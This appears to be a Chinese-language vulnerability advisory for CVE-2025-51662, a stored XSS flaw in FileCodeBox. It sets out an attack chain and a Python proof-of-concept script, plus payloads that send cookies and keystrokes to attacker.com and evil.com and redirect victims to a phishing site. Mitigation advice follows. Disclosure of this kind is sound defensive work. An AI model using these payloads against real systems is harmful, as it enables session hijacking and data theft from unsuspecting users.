CVE-2025-51662 FileCodeBox存储型XSS漏洞安全预警

漏洞信息

漏洞编号

CVE-2025-51662

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

FileCodeBox

漏洞概述

CVE-2025-51662是FileCodeBox项目中一个严重的安全漏洞，属于存储型跨站脚本攻击（Stored XSS）。FileCodeBox是一款开源的临时文件分享工具，用户可以通过该平台快速分享代码文本片段。该漏洞存在于FileCodeBox的文本分享功能模块中，攻击者可以利用此漏洞向系统中注入恶意JavaScript代码。由于攻击代码被存储在数据库中，任何访问受感染codebox的用户都会自动触发恶意脚本执行。攻击者通过构造特定的XSS payload，当其他用户点击链接或输入分享码访问该codebox时，恶意JavaScript代码会在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。该漏洞影响FileCodeBox 2.2及之前所有版本，CVSS评分5.4，属于中等严重程度。漏洞已于2025年11月19日披露，建议用户及时更新到最新版本以修复此安全问题。

技术细节

FileCodeBox的文本分享功能存在输入验证不足的安全缺陷。攻击者可以通过API或Web界面提交包含恶意JavaScript代码的文本内容到codebox中。由于系统未对用户输入进行充分的HTML转义或内容安全策略（CSP）验证，恶意代码被直接存储到数据库中。当其他用户通过访问受感染codebox的链接或输入分享码时，服务器将包含恶意脚本的内容返回给用户浏览器，浏览器将其解析为可执行脚本并执行。攻击payload示例：<script>alert(document.cookie)</script>，该代码可被替换为更复杂的JavaScript代码用于窃取用户会话令牌、键盘记录或重定向用户到恶意网站。漏洞利用条件：攻击者需要拥有系统账号（低权限即可），通过正常的文本分享功能注入payload。攻击成功需要目标用户访问受感染的codebox链接或输入对应的分享码。由于是存储型XSS，攻击具有持久性，只要受感染的codebox存在，所有访问者都会受到攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标使用FileCodeBox系统，确认版本号<=2.2

STEP 2

账号准备

攻击者注册账号或利用已有低权限账号登录系统

STEP 3

Payload构造

攻击者构造XSS恶意payload，如<script>alert(document.cookie)</script>

STEP 4

注入恶意代码

通过API或Web界面提交包含XSS payload的文本内容到codebox

STEP 5

持久化存储

系统将恶意代码未经过滤直接存储到数据库中

STEP 6

传播攻击链接

攻击者将受感染的codebox链接或分享码发送给目标用户

STEP 7

触发执行

受害者访问受感染codebox时，服务器返回恶意内容，浏览器执行XSS脚本

STEP 8

数据窃取/会话劫持

恶意JavaScript执行后可窃取Cookie、会话令牌、键盘输入等敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-51662 Stored XSS PoC for FileCodeBox
# This PoC demonstrates the XSS vulnerability in FileCodeBox text sharing feature

import requests
import json

TARGET_URL = "http://target-filecodebox.com"

# XSS payload - can be customized for different attack scenarios
xss_payload = '<script>alert(document.cookie)</script>'

# Method 1: Exploit via API endpoint
def exploit_via_api():
    """Send malicious payload through FileCodeBox API"""
    api_url = f"{TARGET_URL}/api/share"
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    # Malicious payload disguised as normal text
    data = {
        "content": f"Normal text content {xss_payload} more text",
        "expiry": "1h",
        "password": ""
    }
    
    try:
        response = requests.post(api_url, json=data, headers=headers, timeout=10)
        if response.status_code == 200:
            result = response.json()
            share_code = result.get("code", "")
            print(f"[+] XSS payload injected successfully!")
            print(f"[+] Share code: {share_code}")
            print(f"[+] Access URL: {TARGET_URL}/box/{share_code}")
            print(f"[!] Any user accessing this link will trigger the XSS")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Method 2: Exploit via web interface (requires session)
def exploit_via_web(session):
    """Send malicious payload through web interface"""
    submit_url = f"{TARGET_URL}/submit"
    
    data = {
        "content": xss_payload,
        "expiry": "24h"
    }
    
    try:
        response = session.post(submit_url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Web interface exploitation successful")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Advanced payload examples
advanced_payloads = {
    "cookie_stealer": '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>',
    "session_hijack": '<img src=x onerror="fetch(\'https://evil.com/log?data=\'+btoa(document.cookie))">',
    "phishing_redirect": '<script>window.location="https://fake-bank.com/phish"</script>',
    "keylogger": '<script>document.onkeypress=function(e){fetch("https://attacker.com/klog?k="+e.key)}</script>'
}

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-51662 FileCodeBox Stored XSS Exploitation")
    print("=" * 60)
    exploit_via_api()

影响范围

FileCodeBox <= 2.2

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)在前端增加输入过滤，拦截<script>等危险标签；2)在后端实现XSS过滤器，对特殊字符进行转义；3)启用HTTPOnly和Secure标志保护Cookie；4)对文本分享功能增加验证码或速率限制；5)监控异常访问日志，及时发现XSS攻击行为；6)考虑临时禁用文本分享功能或限制可信用户使用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-51662
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-51662
3 Details https://www.cvedetails.com/cve/CVE-2025-51662/
4 VulDB https://vuldb.com/cve/CVE-2025-51662
5 Link https://github.com/vastsa/FileCodeBox
6 Link https://github.com/vastsa/FileCodeBox/issues/351
7 Link https://github.com/vastsa/FileCodeBox/issues/351